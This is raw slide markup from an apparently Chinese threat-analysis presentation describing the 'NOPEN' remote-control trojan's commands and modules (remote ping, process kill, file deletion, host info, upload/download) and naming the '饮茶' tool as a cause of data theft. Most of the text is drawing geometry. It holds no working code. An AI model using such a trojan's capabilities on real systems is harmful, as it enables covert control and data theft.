                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-pid：查看远程受控端进程ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-icmptimetarget_ip [source_ip]：远程Ping目标地址，查看时延</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-ifconfig：查看远程主机的IP地址设置和MAC地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-nslookup：远程对指定域名进行解析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-ping：远程Ping目标地址，用于内网探测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-trace：远程traceroute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-fixudp port：指定UDP传输端口</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“NOPEN”远控木马受控端功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1526540" y="2066290"/>
            <a:ext cx="5852160" cy="4078605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>1. KillProc、kill：终止指定进程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2. Chmod：为指定对象赋权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>3. GetCWD：获得当前工作目录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>4. GetPid：获得当前进程ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>5. DeleteFile_Dir：删除指定文件或目录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>6. GetFileMD5：获得指定文件MD5摘要</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>7. GetPCInfo：获得所在主机环境信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>8. Recv：上传、下载数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>9. Connect：建立socket连接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635635" y="1165225"/>
            <a:ext cx="11265535" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>受控端根据主控端指令组合调用相应模块执实现相关恶意操作。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>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619125" y="223520"/>
            <a:ext cx="1130935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“饮茶”是导致大量敏感数据遭窃的最直接“罪魁祸首”之一</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="475615" y="1209040"/>
            <a:ext cx="10389235" cy="5051425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5764530" y="6167120"/>
            <a:ext cx="1554480" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击场景流程</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“饮茶”的功能模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="78" name="组合 77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3975934" y="1683969"/>
            <a:ext cx="4078432" cy="3879484"/>
            <a:chOff x="2522838" y="822445"/>
            <a:chExt cx="3933826" cy="3741932"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="79" name="组合 78"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2522838" y="822445"/>
              <a:ext cx="3933826" cy="3741932"/>
              <a:chOff x="3143512" y="938469"/>
              <a:chExt cx="3933826" cy="3741932"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="95" name="Freeform 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5108771" y="1693914"/>
                <a:ext cx="1968567" cy="1539563"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 501 w 1059"/>
                  <a:gd name="T1" fmla="*/ 800 h 828"/>
                  <a:gd name="T2" fmla="*/ 745 w 1059"/>
                  <a:gd name="T3" fmla="*/ 801 h 828"/>
                  <a:gd name="T4" fmla="*/ 993 w 1059"/>
                  <a:gd name="T5" fmla="*/ 314 h 828"/>
                  <a:gd name="T6" fmla="*/ 506 w 1059"/>
                  <a:gd name="T7" fmla="*/ 66 h 828"/>
                  <a:gd name="T8" fmla="*/ 310 w 1059"/>
                  <a:gd name="T9" fmla="*/ 211 h 828"/>
                  <a:gd name="T10" fmla="*/ 0 w 1059"/>
                  <a:gd name="T11" fmla="*/ 637 h 828"/>
                  <a:gd name="T12" fmla="*/ 501 w 1059"/>
                  <a:gd name="T13" fmla="*/ 800 h 828"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1059" h="828">
                    <a:moveTo>
                      <a:pt x="501" y="800"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="578" y="826"/>
                      <a:pt x="663" y="828"/>
                      <a:pt x="745" y="801"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="948" y="735"/>
                      <a:pt x="1059" y="517"/>
                      <a:pt x="993" y="314"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="927" y="111"/>
                      <a:pt x="709" y="0"/>
                      <a:pt x="506" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="424" y="93"/>
                      <a:pt x="356" y="145"/>
                      <a:pt x="310" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="637"/>
                      <a:pt x="0" y="637"/>
                      <a:pt x="0" y="637"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="501" y="800"/>
                    </a:lnTo>
                    <a:close/>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lt1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="96" name="Freeform 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5107667" y="2878363"/>
                <a:ext cx="1534049" cy="1802038"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 826"/>
                  <a:gd name="T1" fmla="*/ 526 h 970"/>
                  <a:gd name="T2" fmla="*/ 75 w 826"/>
                  <a:gd name="T3" fmla="*/ 759 h 970"/>
                  <a:gd name="T4" fmla="*/ 615 w 826"/>
                  <a:gd name="T5" fmla="*/ 844 h 970"/>
                  <a:gd name="T6" fmla="*/ 700 w 826"/>
                  <a:gd name="T7" fmla="*/ 304 h 970"/>
                  <a:gd name="T8" fmla="*/ 502 w 826"/>
                  <a:gd name="T9" fmla="*/ 163 h 970"/>
                  <a:gd name="T10" fmla="*/ 1 w 826"/>
                  <a:gd name="T11" fmla="*/ 0 h 970"/>
                  <a:gd name="T12" fmla="*/ 1 w 826"/>
                  <a:gd name="T13" fmla="*/ 526 h 970"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="826" h="970">
                    <a:moveTo>
                      <a:pt x="1" y="526"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="607"/>
                      <a:pt x="24" y="689"/>
                      <a:pt x="75" y="759"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="201" y="931"/>
                      <a:pt x="442" y="970"/>
                      <a:pt x="615" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="788" y="719"/>
                      <a:pt x="826" y="477"/>
                      <a:pt x="700" y="304"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="649" y="234"/>
                      <a:pt x="579" y="186"/>
                      <a:pt x="502" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="0"/>
                      <a:pt x="1" y="0"/>
                      <a:pt x="1" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1" y="526"/>
                    </a:lnTo>
                    <a:close/>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lt1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="97" name="Freeform 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3578030" y="2878363"/>
                <a:ext cx="1535151" cy="1802038"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 324 w 826"/>
                  <a:gd name="T1" fmla="*/ 163 h 970"/>
                  <a:gd name="T2" fmla="*/ 126 w 826"/>
                  <a:gd name="T3" fmla="*/ 304 h 970"/>
                  <a:gd name="T4" fmla="*/ 211 w 826"/>
                  <a:gd name="T5" fmla="*/ 844 h 970"/>
                  <a:gd name="T6" fmla="*/ 751 w 826"/>
                  <a:gd name="T7" fmla="*/ 759 h 970"/>
                  <a:gd name="T8" fmla="*/ 824 w 826"/>
                  <a:gd name="T9" fmla="*/ 526 h 970"/>
                  <a:gd name="T10" fmla="*/ 824 w 826"/>
                  <a:gd name="T11" fmla="*/ 0 h 970"/>
                  <a:gd name="T12" fmla="*/ 324 w 826"/>
                  <a:gd name="T13" fmla="*/ 163 h 970"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="826" h="970">
                    <a:moveTo>
                      <a:pt x="324" y="163"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="247" y="186"/>
                      <a:pt x="177" y="234"/>
                      <a:pt x="126" y="304"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="477"/>
                      <a:pt x="38" y="719"/>
                      <a:pt x="211" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="384" y="970"/>
                      <a:pt x="625" y="931"/>
                      <a:pt x="751" y="759"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="802" y="689"/>
                      <a:pt x="826" y="607"/>
                      <a:pt x="824" y="526"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="824" y="0"/>
                      <a:pt x="824" y="0"/>
                      <a:pt x="824" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="324" y="163"/>
                    </a:lnTo>
                    <a:close/>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lt1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="98" name="Freeform 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3143512" y="1693914"/>
                <a:ext cx="1965259" cy="1539563"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 749 w 1058"/>
                  <a:gd name="T1" fmla="*/ 211 h 828"/>
                  <a:gd name="T2" fmla="*/ 553 w 1058"/>
                  <a:gd name="T3" fmla="*/ 66 h 828"/>
                  <a:gd name="T4" fmla="*/ 66 w 1058"/>
                  <a:gd name="T5" fmla="*/ 314 h 828"/>
                  <a:gd name="T6" fmla="*/ 314 w 1058"/>
                  <a:gd name="T7" fmla="*/ 801 h 828"/>
                  <a:gd name="T8" fmla="*/ 558 w 1058"/>
                  <a:gd name="T9" fmla="*/ 800 h 828"/>
                  <a:gd name="T10" fmla="*/ 1058 w 1058"/>
                  <a:gd name="T11" fmla="*/ 637 h 828"/>
                  <a:gd name="T12" fmla="*/ 749 w 1058"/>
                  <a:gd name="T13" fmla="*/ 211 h 828"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1058" h="828">
                    <a:moveTo>
                      <a:pt x="749" y="211"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="702" y="145"/>
                      <a:pt x="635" y="93"/>
                      <a:pt x="553" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="350" y="0"/>
                      <a:pt x="132" y="111"/>
                      <a:pt x="66" y="314"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="517"/>
                      <a:pt x="111" y="735"/>
                      <a:pt x="314" y="801"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="396" y="828"/>
                      <a:pt x="481" y="826"/>
                      <a:pt x="558" y="800"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1058" y="637"/>
                      <a:pt x="1058" y="637"/>
                      <a:pt x="1058" y="637"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="749" y="211"/>
                    </a:lnTo>
                    <a:close/>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lt1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="99" name="Freeform 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4391925" y="938469"/>
                <a:ext cx="1435896" cy="1939894"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 696 w 773"/>
                  <a:gd name="T1" fmla="*/ 618 h 1044"/>
                  <a:gd name="T2" fmla="*/ 773 w 773"/>
                  <a:gd name="T3" fmla="*/ 387 h 1044"/>
                  <a:gd name="T4" fmla="*/ 386 w 773"/>
                  <a:gd name="T5" fmla="*/ 0 h 1044"/>
                  <a:gd name="T6" fmla="*/ 0 w 773"/>
                  <a:gd name="T7" fmla="*/ 387 h 1044"/>
                  <a:gd name="T8" fmla="*/ 77 w 773"/>
                  <a:gd name="T9" fmla="*/ 618 h 1044"/>
                  <a:gd name="T10" fmla="*/ 386 w 773"/>
                  <a:gd name="T11" fmla="*/ 1044 h 1044"/>
                  <a:gd name="T12" fmla="*/ 696 w 773"/>
                  <a:gd name="T13" fmla="*/ 618 h 1044"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="773" h="1044">
                    <a:moveTo>
                      <a:pt x="696" y="618"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="744" y="553"/>
                      <a:pt x="773" y="473"/>
                      <a:pt x="773" y="387"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="773" y="173"/>
                      <a:pt x="600" y="0"/>
                      <a:pt x="386" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="0"/>
                      <a:pt x="0" y="173"/>
                      <a:pt x="0" y="387"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="473"/>
                      <a:pt x="29" y="553"/>
                      <a:pt x="77" y="618"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="1044"/>
                      <a:pt x="386" y="1044"/>
                      <a:pt x="386" y="1044"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="696" y="618"/>
                    </a:lnTo>
                    <a:close/>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lt1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="80" name="组合 79"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2644812" y="938469"/>
              <a:ext cx="3689878" cy="3509884"/>
              <a:chOff x="7299061" y="938469"/>
